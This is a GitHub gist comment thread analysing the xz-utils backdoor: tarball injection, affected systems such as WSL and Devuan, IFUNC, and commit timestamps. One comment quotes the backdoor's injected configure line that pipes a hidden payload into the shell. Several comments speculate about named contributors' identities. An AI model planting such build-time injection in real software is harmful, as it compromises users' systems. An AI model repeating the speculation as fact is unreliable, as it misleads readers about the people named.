I want to note - I'm not an expert or anything, but it seems the way of malware infections are now spread is not through cringy downloads from sketchy sites. It seems that attackers are now working towards infecting safe, regular files.

Example: Fractureiser was the result of a guy who compromised CurseForge accounts and injected code into Minecraft Mod JAR files that would then download a payload, and basically install hidden malware onto the system and sneakily hide itself in with similar names to other legit programs.

Here, although this was not account compromise, the idea of sneakily injecting and obfuscating malicious code to secretly do a payload, and then hide itself for a scary amount of time before tech-savvy people figure out something suspicious is going on.

This makes it easier for bad actors in many different ways - this solves the issue of users thinking "I couldn't have gotten a virus, I got it from a legitimate source!" and also solves the issue of being apparent malware that the user knows something is wrong. Instead it will just sit dormant and do its work, without ever having to reveal itself.

Nothing new. For sake of security, FOSS always works as a PoW (proof of work) system: if you don't work hard enough to review all the code you use by yourself (to prove it is "secure" enough), they can be compromised for a long time. Sometimes there are even no bad actors at all, just plain old bugs, before you get some damage.

For anyone lacking of capability to audit the code, they have to make someone else to do the work. Blindly relying on the reputation of normal developers is also the trivial implementation of this strategy, and (ironically) it really works, just not well in cases like this one.

That's still better than a world of blobs everywhere, at least in the cost of identifying the risks (even not fixable).

@smokhov
Copy link

smokhov commented Mar 31, 2024

@ItzSwirlz -- this why this is gaining steam now for the supply chain attacks to target something that is very widely used; audits should be done based on more than just trust for all popular (and not) source code components, esp. libraries. CI/CD pipelines should offer such services by default on places like GitHub, GitLab, etc to developers free of charge. Like dependabot does here or other static scanners, should also vet release tarballs. But hard to prevent an insider going rogue like that guy I forgot for a popular node package did a couple of years ago... This is a real problem. Still glad this happened in the open and open source so it can be caught sooner than if say this same thing happens at a proprietary developed popular application from a private company without code open for audit.

@CodingWithAnxiety
Copy link

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

This also prevents vendor lock-in. Consider when you have a compromised meson...

Dear god, what're you trying to do? Make linux unusable? We have gentoo for this which, by the way, was also affected by this XZ backdoor. "Make every distro compiled..."

You seem to forget not everyone has a top of the line CPU. God forbid you like google chrome or any proprietary software...

@lazyruss
Copy link

i have not checked v5.6.0 but in 5.6.1 build-to-host.m4 is not important. Script injection code is right in configure (at least in debian tarball).
"build-to-host":C) eval $gl_config_gt | $SHELL 2>/dev/null ;;

@thesamesam
Copy link
Author

thesamesam commented Mar 31, 2024

@lazyruss The variables which populate $gl_config_gt come from m4/build-to-host.m4. In general, M4 macros are used to populate configure. configure is a generated file and is the product of various other bits, including M4 macros.

@jsuelwald
Copy link

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

And this won't change anything as the source code was compromised itself.

@zacanger
Copy link

zacanger commented Mar 31, 2024

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

And this won't change anything as the source code was compromised itself.

It's also not a great idea. Source distribution sounds great, but I don't really want to waste 30 minutes buliding Firefox every time I update, and many package managers and Linux distributions can't afford build servers to manually reset, test checksums against the upstream repo, re-apply distro/package-manager-specific patches, and build.

From what I understand, this Gist and its comments are meant to be discussion of this specific issue, though (scroll to the top and read the TODOs). It might be useful to move all this other discussion, which has a lot of good ideas, somewhere else. There are good ideas in here that someone might want to work with, but a lot of them aren't relevant to figuring out the impact of this attack and mitigating it in the short term.

@AlexBaranowski
Copy link

AlexBaranowski commented Mar 31, 2024

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd

@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

@timtas
Copy link

timtas commented Mar 31, 2024

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd

@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

@TommyTran732
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd

@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x
Screenshot 2024-03-31 at 00 33 35

@TommyTran732
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd
@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

Not helpful man. What is wrong with you?

@zacanger
Copy link

zacanger commented Mar 31, 2024

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x

@TommyTran732 Last I checked (a few years ago) WSL just uses ther chosen distro's package repositories. So for Ubuntu, on everything except noble (24.04), it's 5.4 or 5.2. On noble it was at 5.6.1, but then re-released as 5.6.1+really5.4.5-1. Should be fine unless anyone was testing the upcoming release, or backporting packages.

@threefcata
Copy link

@Z-nonymous I find you very pretentious. On one hand you keep claiming 'this is not against China or Chinese', MEANWHILE, all your apparent genuine questions and reasonable doubts imply something so obvious that you keep denying. Stop even trying to fool everyone, do you think nobody sees what you are trying to get at?

@daniel-dona
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd
@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

Wasn't the initial reporter of the xz-utils backdoor a Microsoft developer? 🤨

@bwDraco
Copy link

bwDraco commented Mar 31, 2024

My Gentoo systems build xz-utils with Clang LTO. Does this circumvent the backdoor?

@githubuser6000
Copy link

@thesamesam Is there a way I can donate to the original maintainer?

@f00b4r0
Copy link

f00b4r0 commented Mar 31, 2024

@thesamesam dunno if this was mentioned before, but it's not clear from the current FAQ: systems NOT using systemd may still be affected, simply because libsystemd is installed. Case in point: Devuan, which does not use systemd init but still ships a Debian-patched sshd that links in libsystemd and loads liblzma.

https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=openssh-server=1:9.7p1-2+b1
https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=libsystemd0=255.4-1+b1

HTH

@leagris
Copy link

leagris commented Mar 31, 2024

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x <img alt="Screenshot 2024-03-31 at 00 33

dpkg-query -Wf '${package}\t${Version}\n' '*xz*'

@pillowtrucker
Copy link

@thesamesam dunno if this was mentioned before, but it's not clear from the current FAQ: systems NOT using systemd may still be affected, simply because libsystemd is installed. Case in point: Devuan, which does not use systemd init but still ships a Debian-patched sshd that links in libsystemd and loads liblzma.

https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=openssh-server=1:9.7p1-2+b1 https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=libsystemd0=255.4-1+b1

HTH

looool they bragged the whole day on twitter that they're immune to it because they don't have evil systemd but they're too stupid to know what the package they leeched off debian actually links against

@FlyingFathead
Copy link

FlyingFathead commented Mar 31, 2024

The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.

After my earlier comment on this yesterday and having slept on it, I no longer can't get past the thought of how this is a prime example of prioritizing convenience over secure practices. The fact that an attack like this can be "slipped in" just like that means that tarball tampering is going to be a target vector for supply chain attacks and other types of code tampering. Especially after this case, now that the cat's out of the bag, so to speak.

Repo tarballs should compare against the repo contents. Having a "single source of truth" for all components of the project is the idea. There is a dire need to ensure consistency between what developers see and work with in the repository and what end users receive in the tarball.

Whatever it introduces in terms of increased complexity, required automation and such, needs to be worked out. Include build tools in the tarball if need be, more robust integrity checks, automated consistency checks, transparent build processes, version-controlled release artifacts, reproducible builds, automated auditing, there's already multiple suggestions on this... perhaps that's a tall order, but right now, this attack implies that any project with a tarball out there might have literally anything in it. There's no other way to put it than the current practice showing a gaping security hole that overall enabled this exploit.

How can we be sure that this method of attack isn't already being utilized in other projects right now?

@gh-nate
Copy link

gh-nate commented Mar 31, 2024

@thesamesam: Hi, there are coordinated reverse engineering efforts ongoing on chat room(s) as discussed/posted under the linked Openwall oss-security mailing list thread. Is this worth a mention on your gist?

I refrained from posting the exact details here due to the risk of the low quality of the discussion spreading over.

@trip54654
Copy link

trip54654 commented Mar 31, 2024

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

Edit: and in particular, does IFUNC have the potential to reduce security by design?

@jgilbert2017
Copy link

jgilbert2017 commented Mar 31, 2024

(slightly off topic)
I have submitted a feature request to the c# package management system nuget to request support for publishing packages via source (git commit hash). Publishing is currently achieved via author signed binaries (oof).

Please see the issue below and voice your opinion on this if you have one.
NuGet/NuGetGallery#9889

We should take the lessons learned from this incident and apply them across the entire OSS ecosystem.

@jmakovicka
Copy link

jmakovicka commented Mar 31, 2024

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

They added CPU optimized CRC computation code, which served as a pretext for ifunc usage.

Similarly, the test infrastructure was created as a hideout for the malicious payload.

@AdrianBunk
Copy link

@smintrh78 I've responded there why your suggestion implies that you don't understand the problem.

@teyhouse
Copy link

I did some testing regarding detecting the CVE inside container images. As of right now, it seems the default container Scan from Trivy does not yet detect CVE-2024-3094, but grype does. I would recommend checking on SBOM-Base, for example:
https://github.com/teyhouse/CVE-2024-3094/blob/main/check_sbom.sh

image

@Sepero
Copy link

Sepero commented Mar 31, 2024

If instead of obfuscated code, imagine if the attacker did things a little smarter? Like perhaps an "accidental" buffer overflow (or other memory based exploit)...

@FrankHB
Copy link

FrankHB commented Mar 31, 2024

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.
This also prevents vendor lock-in. Consider when you have a compromised meson...

Dear god, what're you trying to do? Make linux unusable? We have gentoo for this which, by the way, was also affected by this XZ backdoor. "Make every distro compiled..."

You seem to forget not everyone has a top of the line CPU. God forbid you like google chrome or any proprietary software...

This has nothing to Linux itself, as this can be a pure userland thing, and I don't say it should prevent you to specify any "source" in the form of precompiled binaries (including the kernel image) once you are already confident enough.

The key point is to make sure each piece of binary code (except locally developed by users) totally artifacts from some really auditable source which is actually used by the system, rather than just some ramdom source packages separately maintained by the upstream repo admins.

This is not far from the spirit of meson mentioned here. It is just a strategy enforced in the whole system by default.

Gentoo is not that unusable the binary cache is effectively shared. A more significant problem is, it seems so unfriendly to carbon footprint in any serious configuration... It is certainly a nonstarter for most users lacking the knowledge about what happens under the hood (esp. to distinguish which parts of the building during the installation are actually totally redundant).

To share the cache efficiently, you have to share the configuartions to precisely reproduce the builds of almost any pieces of software in the system. Unfortunately, most binary distros lack the mechanism to handle such things systemtically. In my best knowledge, nix and guix are a few to get such things virtually right in the basis (purely functional configuration versioning), but still too far from most industrial users.

This also won't automatically solve the problems of inefficient build system, though.

@wtznc
Copy link

wtznc commented Mar 31, 2024

GitHub has just restored access to his account. There may be many more repositories where malicious code can be found - e.g. llvm compiler llvm/llvm-project#63957

@SyntaxDreamer
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd
@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

An infected host, regardless of where or how it is running, affects everyone equally. DoS attacks, spam, relays, etc. Does it matter if it's running under Windows WLS, a VM or docker? No, it does not.

@Leseratte10
Copy link

GitHub has just restored access to his account.

Doesn't look like it. "JiaT75" is still suspended.

@NuLL3rr0r
Copy link

Somebody created this single page analysis on Twitter.

Also this gist is very intersting.
1000061068

@Leseratte10
Copy link

Leseratte10 commented Mar 31, 2024

You're looking in the wrong place. Just because you can see the profile doesn't mean the user isn't suspended

screenshot

@thimslugga
Copy link

GitHub has just restored access to his account. There may be many more repositories where malicious code can be found - e.g. llvm compiler llvm/llvm-project#63957

Perfect, now they can return back to doing their part as a little “helper elf”. Lol, perhaps a very subtle cue to what they had on their mind.

Just trying to do my part as a helper elf!

Jia Tan

https://www.mail-archive.com/xz-devel@tukaani.org/msg00518.html

@wtznc
Copy link

wtznc commented Mar 31, 2024

This situation made me wonder how many other such libraries are developed by (mostly) one person and end up in most Linux distributions, but the author is not actively involved in their development. This is a potential vector for further attacks. I am very curious about the social aspect - how this relationship and trust was built between the authors.

@Fearyncess
Copy link

Fearyncess commented Mar 31, 2024

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

@Z-nonymous I'm not sure what your point is there... xry111 just misunderstood whatever the OpenSSL procedure is. t8m and slontis are both well-known, longstanding members of the OpenSSL team.

Just asking if they really reviewed. for side effects

I don't say they submit faulty code _they might be sometimes on good faith wrongly approving stuff from a bad actor that ends up having side effects. that's why I noted the pure issue. They maybe really want to push Loongson arch support and are played.

xry111 and xen0n are both maintainers of some of the loong ports in the kernel/toolchain and I'm not surprised they show up to review other changes to core packages where the changes are specific to loong...

I'm making correlations, asking advice. i.e. liblzma_la-crc64-fast.o is the backdoor as per https://gynvael.coldwind.pl/?id=782 xry111 was also commit code for LoongArch for CRC code in xv approved by JiaT75 in tukaani-project/xz#86

, loong isn't exactly a big target.

Well, I need to further investigate, there has been reviews from them in many code/functions modules that are in the analysis from thread in https://www.openwall.com/lists/oss-security/2024/03/29/4 that have been modified for LoongArch in some form The breath of area they are contributing (comments, reviews, approvals, PRs) in that team is everywhere, Compilation, system services, ssl, crypto, kernel, localization, html, assembly, c, rust, node, nvm, dosbox,

They can't potentially know every possible implications of updates in such a large code base.

Again: I don't say they submit faulty code _they might be sometimes on good faith wrongly approving stuff from a bad actor that ends up having side effect they don't apprehend. I will review make-ca but maybe there are places

In any case, to me, this looks a bit like a witch-hunt against two people who are Chinese.

Do you know these people IRL ? Do you know the people they approve the PRs of ? How do you know any GH user is Chinese ? Only real police/federal/interpol investigation can determine that. Even then sometimes they could arrest someone who happened to have found a usb key in Latvia instead of a Russian agent.

I've worked with many Chinese colleages in research & engineering, they are as brilliant minds as anyone. I never implied anything Chinese-related, maybe my fault was trying to explain that Loongson is a Chinese CPU manufacturer for context. I even ever say they were actually from that company. I just assumed they implement support for it.

They might be played by people complaing about bad Loongson support, providing engineered reports, forcing to make changes they don't always understand the side effects.

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

By your words, a "25-year Unix commercial TALENT" smells in this thread like a JiaT75's partner, even himself. Because you are spreading misinformation and trying to slander the other person, that also can be a part of THIS APT. Don't you think so?

@Carnildo
Copy link

If instead of obfuscated code, imagine if the attacker did things a little smarter? Like perhaps an "accidental" buffer overflow (or other memory based exploit)...

Truly accidental buffer overflows are so common that most systems have protections against them. The days of simply dropping shellcode on the stack are long gone.

@x1done
Copy link

x1done commented Mar 31, 2024

I am not familiar with coding, but on 2024-02-12, the commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin. Is it expected?

commit e0c0ee475c0800c08291ae45e0d66aa00d5ce604
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

...

commit de5c5e417645ad8906ef914bc059d08c1462fc29
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit e446ab7a18abfde18f8d1cf02a914df72b1370e3
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit 7f6d9ca329ff3e01d4b0be7366eb4f5c93da41b9
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

https://raw.githubusercontent.com/freebsd/freebsd-src/ee36e7faceafeef05c5e81654a1d8ec11d314894/contrib/xz/ChangeLog

@ItzSwirlz
Copy link

I am not familiar with coding, but on 2024-02-12, the commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin. Is it expected?

commit e0c0ee475c0800c08291ae45e0d66aa00d5ce604
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

...

commit de5c5e417645ad8906ef914bc059d08c1462fc29
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit e446ab7a18abfde18f8d1cf02a914df72b1370e3
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit 7f6d9ca329ff3e01d4b0be7366eb4f5c93da41b9
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

https://raw.githubusercontent.com/freebsd/freebsd-src/ee36e7faceafeef05c5e81654a1d8ec11d314894/contrib/xz/ChangeLog

Probably modifying and tampering with git commits manually

@thesamesam
Copy link
Author

Just keep in mind that this is kind of normal when applying someone else's commits via rebase or git am, especially if patches got emailed or similar. Not saying that is what happened here but it's not super abnormal either.

@crrodriguez
Copy link

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

Edit: and in particular, does IFUNC have the potential to reduce security by design?

ifunc is an ELF feature that is used to select target-specific optimizations in glibc, in order to pick the fastest routine for your hardware of basic functions, for example memcpy , all the math routines ..all from a single library and not dozens or hundreds of different builds to target all user hardware.
some basic explanation here https://jasoncc.github.io/gnu_gcc_glibc/gnu-ifunc.html

@thesamesam
Copy link
Author

IFUNC was probably not worth using here and Lasse wasn't really in love with it as he felt it was a lot of complexity, but it isn't useless or anything in general either. But I must admit I did not say it should be removed or anything like that.

@w-flo
Copy link

w-flo commented Apr 1, 2024

commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin

Looking at the repo, eg. here, all 4 commits were commited by Lasse Collin at the same time on Feb 14. He probably received 2 of these commits from Jia Tan (maybe through pull request) and reset the date for all 4 commits, maybe after rebasing to solve merge conflicts, two days before commiting them all at the same time. I'd say that's not suspicious.

@x1done
Copy link

x1done commented Apr 1, 2024

@thesamesam Is this a known issue, and can it be reproduced? Given that the timestamps (and timezones) are exactly the same, the only explanation is that they were triggered by the same person. Since it occurred in February 2024, just a few days before the backdoor was installed, it is probably worth being alerted.

In almost all commit logs, Jia Tan uses the +800 timezone, except for the one above and the following one:

commit 86118ea320f867e09e98a8682cc08cbbdfd640e2
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 23:38:32 +0800					--> +800	Jia Tan		2023-06-27 23:38:32 +0800 (18:38:32 +0300)

    Update THANKS.

 THANKS | 1 +
 1 file changed, 1 insertion(+)

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

commit b4cf7a2822e8d30eb2b12a1a07fd04383b10ade3
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2023-06-27 17:24:49 +0300					--> +300	Lasse Collin	2023-06-27 17:24:49 +0300

He switched between the +300 and +800 timezones?

Note that in this case, the timestamps were not the same, so they were unlikely triggered by the same command or commit.

@AdrianBunk
Copy link

@thesamesam
https://bugs.debian.org/1067708
https://git.tukaani.org/?p=xz.git;a=commit;h=ee44863ae88e377a5df10db007ba9bfadde3d314

"Hans Jansen" seems to be another alias of "Jia Tan" (or the alias of a different member of the attacker team).

@xry111
Copy link

xry111 commented Apr 1, 2024

If you apply a patch sent to you from another person (or maybe not a person, whatever) with patch -Np1 then git commit --author=..., the timestamp (including time zone) will be yourselves.

I'd always use git am instead, but AFAIK some people do not. (Edit: and git am is somehow more strict than patch -Np1, so if git am fails but patch -Np1 works people may just commit it with git commit --author=... after visually inspecting the change anyway.)

@thesamesam
Copy link
Author

@x1done b4cf7a2822e8d30eb2b12a1a07fd04383b10ade3 looks OK to me in terms of content. I have a clone from a fair while ago and I don't think any force pushes occurred.

I suspect Lasse applied those and just ended up mangling the timestamps (others have mentioned some scenarios about how it could happen with git am, but it might be worth asking him (once the important stuff is dealt with). Not everyone is super comfortable with git branches so it might be that he exported his own changes and reapplied them later, or similar.

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@AdrianBunk Thanks. I will reflect on if this should be included. It's hard because I do not want to encourage a witch hunt and it's mentioned in some references I included. If you have a suggestion for how I could include it without it sounding accusatory, then that would be helpful.

EDIT: Maybe I could mention it in the context of when the IFUNC stuff got introduced.

@AdrianBunk
Copy link

Is this a known issue, and can it be reproduced? Given that the timestamps (and timezones) are exactly the same, the only explanation is that they were triggered by the same person.

@x1done Some batch action was done by the same person (Lasse).

You can reproduce the effect in many ways, for example with:

git format-patch -2
git reset --hard HEAD^^
git am --ignore-date 000*

From looking at the (untampered) autoconf code I got the impression that Lasse is (like me) someone who was already developing software in the 1990s, many years before git was written. People who started coding before git existed often have some pre-git habits in their workflows since you usually don't change everything when starting to use a new tool, it wouldn't shock me if what happened for example included such an export to patches and then re-import to git.

@thesamesam
Copy link
Author

@AdrianBunk This matches my understanding on all parts.

@x1done
Copy link

x1done commented Apr 1, 2024

@thesamesam To be honest, here I'm not really interested in what was committed, but rather about the timezone and timestamps, especially the following one:

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

I don't think it was a commit triggered from account 'Lasse Collin', as there were no other events at the same timestamp. In that case, it should be from account Jia Tan itself. This raises the question, why did Jia Tan change his timezone to +300?

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer). It's been covered how the time might change to Lasse's when applying a patch from someone else.

EDIT: xry111 rightly points out in https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007558#gistcomment-5007558 that the pusher may be a third person and this isn't represented in git metadata.

@ItzSwirlz
Copy link

@x1done daylight savings?

@xry111
Copy link

xry111 commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer).

Both the author and the committer is Jia Tan:

$ git show 3d1fdddf92321b516d55651888b9c669e254634e --format=fuller | head
commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

    Docs: Document the configure option --disable-ifunc in INSTALL.

diff --git a/INSTALL b/INSTALL
index 7fb41fa6..b64c56c5 100644

But the person pushed this commit is allowed to be neither author nor committer. (I.e. it may happen that A authored the change, B committed the change, and C pushed the change.)

It's not possible to find the person pushed the commit with git CLI. AFAIK there is some GitHub API to figure out when and who pushed a commit. However the repo is under suspension, and even it's not I still don't know if this approach will work when the GitHub repo is only a mirror.

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

Yes, you're absolutely right. The person who pushed it may be a third person which isn't represented in the commit metadata.

EDIT: I will edit my earlier comment and link to that.

@x1done
Copy link

x1done commented Apr 1, 2024

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

@thesamesam In the scenario (as xry111 has explained) on 2024-02-12, I guess there should be multiple events from both accounts at the same time. However, with this one, there is only a single event at that time.

@AdrianBunk
Copy link

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me).
+0300 is Finnish summer time.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk
Copy link

AdrianBunk commented Apr 1, 2024

